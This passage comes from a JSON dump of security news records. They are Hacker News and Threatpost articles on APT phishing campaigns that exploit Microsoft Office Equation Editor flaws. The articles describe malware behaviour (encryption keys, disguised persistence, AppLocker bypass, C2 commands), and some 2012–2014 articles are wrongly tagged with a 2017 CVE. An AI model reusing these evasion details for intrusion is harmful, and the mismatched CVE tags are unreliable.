command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.\n\n\"Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including [China](<https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations>), Pakistan, and Saudi Arabia,\" Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, [told](<https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html>) The Hacker News.\n\n\"And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise.\"\n\nBitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hacking group motivated primarily by intelligence gathering, an operation that's facilitated by means of malware such as BitterRAT, ArtraDownloader, and AndroRAT. Prominent targets include the energy, engineering, and government sectors.\n\nThe earliest attacks distributing the mobile version of BitterRAT date back to September 2014, with the actor having a history of leveraging zero-day flaws \u2014 [CVE-2021-1732](<https://blog.cyble.com/2021/02/24/bitter-apt-enhances-its-capability-with-windows-kernel-zero-day-exploit/>) and [CVE-2021-28310](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>) \u2014 to its advantage and accomplishing its adversarial objectives.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg>)\n\nThe latest campaign, targeting an elite entity of the Bangladesh government, involves sending spear-phishing emails to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB).\n\nAs is typically observed in other social engineering attacks of this kind, the missives are designed to lure the recipients into opening a weaponized RTF document or a Microsoft Excel spreadsheet that exploits previously known flaws in the software to deploy a new trojan dubbed \"ZxxZ.\"\n\nZxxZ, named so after a separator used by the malware when sending information back to the C2 server, is a 32-bit Windows executable compiled in Visual C++.\n\n\"The trojan masquerades as a Windows Security update service and allows the malicious actor to perform remote code execution, allowing the attacker to perform any other activities by installing other tools,\" the researchers explained.\n\nWhile the malicious RTF document exploits a memory corruption vulnerability in Microsoft Office's Equation Editor ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>)), the Excel file abuses two remote code execution flaws, [CVE-2018-0798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0798>) and [CVE-2018-0802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0802>), to activate the infection sequence.\n\n\"Actors often change their tools to avoid detection or attribution, this is part of the lifecycle of a threat actor showing its capability and determination,\" Ventura said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T12:37:00", "type": "thn", "title": "Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2022-05-12T01:27:46", "id": "THN:75586AE52D0AAF674F942498C96A2F6A", "href": "https://thehackernews.com/2022/05/bitter-apt-hackers-add-bangladesh-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-06-07T19:08:25", "description": "An ongoing surveillance operation has been uncovered that targets a Southeast Asian government, researchers said \u2013 using a previously unknown espionage malware.\n\nAccording to Check Point Research, the attack involves spear-phishing emails with malicious Word documents to gain initial access, along with the exploitation of older, known Microsoft Office security vulnerabilities. But most notable, researchers said, is the novel backdoor, which they said has been in development by a Chinese APT for at least three years.\n\nThe documents were \u201csent to different employees of a government entity in Southeast Asia,\u201d according to [the Check Point analysis](<https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/>). \u201cIn some cases, the emails are spoofed to look like they were from other government-related entities. The attachments to these emails are weaponized copies of legitimate looking official documents and use the remote template technique to pull the next stage from the attacker\u2019s server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe malicious documents download a template from various URLs, according to the analysis, which are .RTF files embedded with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder. RoyalRoad is a tool that researchers have said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428; it generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe RoyalRoad-generated RTF document contains an encrypted payload and shellcode, according to the analysis.\n\n\u201cTo decrypt the payload from the package, the attacker uses the RC4 algorithm with the key 123456, and the resulted DLL file is saved as 5.t in the %Temp% folder,\u201d researchers said. \u201cThe shellcode is also responsible for the persistence mechanism \u2013 it creates the scheduled task named Windows Update that should run the exported function StartW from 5.t with rundll32.exe, once a day.\u201d\n\nThe .DLL gathers data on the victim\u2019s computer including the OS name and version, user name, MAC addresses of networking adapters and antivirus information. All of the data is encrypted and then sent to the attackers\u2019 command-and-control server (C2) via [GET HTTP request method](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>). After that, a multi-stage chain eventually results in the installation of the backdoor module, which is called \u201cVictory.\u201d It \u201cappears to be a custom and unique malware,\u201d according to Check Point.\n\n## **Victory Backdoor**\n\nThe malware is built to steal information and provide consistent access to the victim. Check Point researchers said it can take screenshots, manipulate files (including creating, deleting, renaming and reading them), gather information on the top-level windows that are open, and shut down the computer.\n\nInterestingly, the malware appears to be related to previously developed tools.\n\n\u201cSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to VirusTotal in 2018,\u201d according to the analysis. \u201cThe files were named by the author as MClient and appear to be part of a project internally called SharpM, according to their PDB paths. Compilation timestamps also show a similar timeframe between July 2017 and June 2018, and upon examination of the files, they were found to be older test versions of our VictoryDll backdoor and its loaders chain.\u201d\n\nThe specific implementation of the main backdoor functionality is identical; and, the connection method has the same format, according to the firm. Also, MClient\u2019s connection XOR key and VictoryDll\u2019s initial XOR key are the same.\n\nHowever, there are differences between the two in terms of architecture, functionality and naming conventions. For instance, MClient features a keylogger, which is absent for Victory. And, Victory\u2019s exported function is named MainThread, while in all versions of the MClient variant the export function was named GetCPUID, according to Check Point.\n\n\u201cOverall, we can see that in these three years, most of the functionality of MClient and AutoStartup_DLL was preserved and split between multiple components \u2013 probably to complicate the analysis and decrease the detection rates at each stage,\u201d the form said. \u201cWe may also assume that there exist other modules based on the code from 2018 that might be installed by the attacker in the later stages of the attack.\u201d\n\n## **Attribution**\n\nCheck Point has attributed the campaign to a Chinese APT. One of the clues is that the first-stage C2 servers are hosted by two different cloud services, located in Hong Kong and Malaysia. These are active in only a limited daily window, returning payloads only from 01:00 \u2013 08:00 UTC Monday through Friday, which corresponds with the Chinese workday. Also, Check Point said that the servers went dormant in the period between May 1 and 5 \u2013 which China\u2019s Labor Day holidays.\n\nOn top of that, the RoyalRoad RTF exploit building kit is a tool of choice among Chinese APT groups; and some test versions of the backdoor contained internet connectivity check with www.baidu.com \u2013 a popular Chinese website.\n\n\u201cWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under the radar for more than three years,\u201d Check Point concluded. \u201cIn this campaign, the attackers utilized the set of Microsoft Office exploits and loaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\u201d\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on **[**Wed, June 9 at 2:00 PM EDT**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. Join the discussion and **[**Register HERE**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)** for free.**\n", "cvss3": {}, "published": "2021-06-07T18:49:44", "type": "threatpost", "title": "Novel 'Victory' Backdoor Spotted in Chinese APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-06-07T18:49:44", "id": "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "href": "https://threatpost.com/victory-backdoor-apt-campaign/166700/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T19:38:25", "description": "A previously undocumented backdoor malware, dubbed PortDoor, is being used by a probable Chinese advanced persistent threat actor (APT) to target the Russian defense sector, according to researchers.\n\nThe Cybereason Nocturnus Team observed the cybercriminals specifically going after the Rubin Design Bureau, which designs submarines for the Russian Federation\u2019s Navy. The initial target of the attack was a general director there named Igor Vladimirovich, researchers said, who received a phishing email.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe attack began with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder \u2013 a tool that Cybereason said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428. RoyalRoad generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe use of RoyalRoad is one of the reasons the company believes Chinese cybercriminals to be behind the attack.\n\n\u201cThe accumulated evidence, such as the infection vector, social-engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware, all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\u201d according to a [Cybereason analysis](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>), published Friday.\n\n## **A Quiet Espionage Malware**\n\nThe RoyalRoad tool was seen fetching the unique PortDoor sample once the malicious RTF document is opened, which researchers said was designed with stealth in mind. It has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more.\n\nOnce executed, the backdoor decrypts the strings using a hardcoded 0xfe XOR key in order to retrieve its configuration information. This includes the command-and-control (C2) server address, a victim identifier and some other minor information.\n\nThe malware then creates an additional file in %temp% with the hardcoded name \u201c58097616.tmp\u201d and writes the GetTickCount value multiplied by a random number to it: \u201cThis can be used as an additional identifier for the target, and also as a placeholder for the previous presence of this malware,\u201d researchers explained.\n\nAfter that, it establishes its C2 connection, which facilitates the transfer of data using TCP over raw sockets, or via HTTPS \u2013 with proxy support. At this point, Cybereason said that PortDoor also has the ability to achieve privilege escalation by stealing explorer.exe tokens.\n\nThen, the malware gathers basic PC info to be sent to the C2, which it bundles with a unique identifier, after which is awaits further instructions.\n\nThe C2 commands are myriad:\n\n * List running processes\n * Open process\n * Get free space in logical drives\n * Files enumeration\n * Delete file\n * Move file\n * Create process with a hidden window\n * Open file for simultaneous operations\n * Write to file\n * Close handle\n * Open file and write directly to disk\n * Look for the \u201cKr*^j4\u201d string\n * Create pipe, copy data from it and AES encrypt\n * Write data to file, append with \u201c\\n\u201d\n * Write data to file, append with \u201cexit\\n\u201d\n\nPortDoor also employs an anti-analysis technique known as dynamic API resolving, according to the analysis.\n\n\u201cThe backdoor is able to hide most of its main functionality and avoid static detection of suspicious API calls by dynamically resolving its API calls instead of using static imports,\u201d researchers explained.\n\n## **Chinese APTs in the Cyberattack Mix \u2013 Probably**\n\nCybereason\u2019s analysis did not yield up a specific Chinese APT actor who would likely be responsible for the attack. However, the researchers said they could make some educated guesses.\n\n\u201cThere are a couple of known Chinese APT groups that share quite a few similarities with the threat actor behind the new malware samples analyzed,\u201d according to the report.\n\nFor instance, the RTF file used in the attack was weaponized with RoyalRoad v7, which was previously observed being used by the Tonto Team, TA428 and Rancor APTs.\n\n\u201cBoth the Tonto Team and TA428 threat actors have been observed attacking Russian organizations in the past, and more specifically attacking research and defense-related targets,\u201d according to the analysis. \u201cWhen comparing the spear-phishing email and malicious documents in these attacks with previously examined phishing emails and lure documents used by the Tonto Team to attack Russian organizations, there are certain similarities in the linguistic and visual style used by the attackers in the phishing emails and documents.\u201d\n\nThat said, the PortDoor malware doesn\u2019t share significant code similarities with previously known malware used by those groups \u2013 leading Cybereason to conclude that it is not a variant of a known malware, which makes it useless in attribution efforts.\n\n\u201cLastly, we are also aware that there could be other groups, known or yet unknown, that could be behind the attack and the development of the PortDoor backdoor,\u201d researchers concluded. \u201cWe hope that as time goes by, and with more evidence gathered, the attribution could be more concrete.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n\n_ _\n", "cvss3": {}, "published": "2021-04-30T19:32:34", "type": "threatpost", "title": "PortDoor Espionage Malware Takes Aim at Russian Defense Sector", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-04-30T19:32:34", "id": "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "href": "https://threatpost.com/portdoor-espionage-malware-takes-aim-at-russian-defense-sector/165770/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, it\u2019s capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:20", "description": "Despite the high profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite an arrest earlier this year of a key member, of the Cobalt Group remains active.\n * A new version on the malware ThreadKit is being actively distributed in October 2018.\n * The CobInt trojan uses a XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In one single campaign, it was credited for stealing over $32,000 from six Eastern Europe ATMs. In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when the EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technology](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0 **\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and one notably being [the now patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing a RFT Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into it\u2019s own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out the update including a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills **\n\nThe ThreadKit payload is the trojan Coblnt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, a XOR routine used to decode the initial Coblnt payload. A XOR, or XOR cipher, is an encryption algorithm that operates on a set of known principles. Encryption and decryption can be performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt group members have only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:03:28", "description": "Dennis Fisher talks with Richard Boscovich of the Microsoft Digital Crimes Unit about the operation to take down the Zeus botnet, how the company works with partners and law enforcement on these operations and the importance of getting the word out to consumers about the danger of botnets.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2012-03-27T20:03:18", "type": "threatpost", "title": "Richard Boscovich on the Zeus Botnet Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:32:31", "id": "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "href": "https://threatpost.com/richard-boscovich-zeus-botnet-takedown-032712/76374/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "As expected, Microsoft delivered a patch today for a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) that was disclosed by HP\u2019s Zero Day Initiative three weeks ago, six months after it was reported to the ZDI.\n\nThe IE8 patch, [MS14-035](<https://technet.microsoft.com/library/security/ms14-035>), is included in a cumulative Internet Explorer rollup that patches 59 flaws in the browser. Most of them are remote-code execution bugs rolling all the way back to IE 6 running on Windows Server 2003 SP2.\n\nThe zero day affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. Microsoft said in May that it was aware of the issue.\n\n\u201cAlthough no attacks have been detected in the wild, the ZDI advisory has given attackers a head start understanding this vulnerability, possibly reducing the time required for researchers to reverse engineer the fix and devise exploit code,\u201d said Craig Young, a security researcher with Tripwire.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nExperts are urging IT administrators to take a close look at a bulletin for Microsoft Word, [MS14-034](<https://technet.microsoft.com/library/security/ms14-034>), which while rated important by Microsoft, should be the next highest patching priority behind IE.\n\nAffecting Microsoft Word 2007, users could be exposed to remote code execution exploits if a malicious Word document is opened on a vulnerable computer.\n\n\u201cMicrosoft rates it only \u2018important\u2019 because user interaction is required\u2014one has to open a Word file\u2014but it allows the attacker Remote Code Execution. In addition, attackers have become quite skilled at tricking users into opening files,\u201d said Qualys CTO Wolfgang Kandek. \u201cWho wouldn\u2019t open a document that brings new information about the company\u2019s retirement plan? The Word vulnerability is in the newer DOCX file format and only applies to the 2007 release. If you are using the newer versions of Office/Word 2010 or 2013 you are not affected.\u201d\n\nThe second critical bulletin, [MS14-036](<https://technet.microsoft.com/library/security/ms14-036>), patches remote code execution bugs in Microsoft graphics in Office and Lync that could be exploited by users visiting malicious webpages or opening a malicious Office file.\n\n\u201cGraphics parsing requires complex logic and has frequently been associated with attack vectors,\u201d said Kandek. \u201cIt affects Windows, Office and the Lync IM client because they all bring their own copy.\u201d\n\nThis month bring 2014\u2019s total number of bulletins issued by Microsoft to 36, well below last year\u2019s pace of 46 through June.\n\n\u201cWe have become accustomed to see around 100 security bulletins for Microsoft products a year, but it looks as if we are in for fewer this year. This runs counter to the general tendency of the year which has already seen its shares of big breaches, 0-days and the big Heartbleed vulnerability in OpenSSL,\u201d Kandek said. \u201cMaybe the reduced count is based on the increased presence of vulnerability brokers that buy up vulnerabilities for internal use? We will see how the second part of the year develops.\u201d\n\nThe remaining bulletins are rated important and include a pair of information disclosure bugs, one denial of service flaw and a tampering vulnerability.\n\n * [MS14-033](<https://technet.microsoft.com/library/security/ms14-033>) addresses an information disclosure vulnerability in Microsoft XML Core Serivces; an exploit on a website designed to invoke XML Core Services through IE could leak data to an attacker.\n * [MS14-032](<https://technet.microsoft.com/library/security/ms14-032>) also patches an information disclosure bug in Microsoft Lync Server. A user tricked into joining a Lync meeting by clicking on a malicious meeting URL could be exploited.\n * [MS14-031](<https://technet.microsoft.com/library/security/ms14-031>) fixes a denial-of-service bug in TCP. An attacker sending a malicious sequence of packets to the target system could cause it to crash.\n * [MS14-030](<https://technet.microsoft.com/library/security/ms14-030>) patches a vulnerability in Remote Desktop that could allow tampering, Microsoft said. If an attacker has man in the middle access to the same network segment as the targeted system during an RDP session and sends malicious RDP packets, they could exploit the vulnerability.\n\n**Adobe Patches Flash Player**\n\nAdobe released a new version of Flash Player that addresses a [critical vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-16.html>) in the software.\n\nFlash 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux are affected.\n\nAdobe said there are no active exploits against these vulnerabilities.\n", "cvss3": {}, "published": "2014-06-10T14:09:16", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday security updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-13T15:41:16", "id": "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "href": "https://threatpost.com/microsoft-patches-ie8-zero-day-critical-word-bug/106572/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": 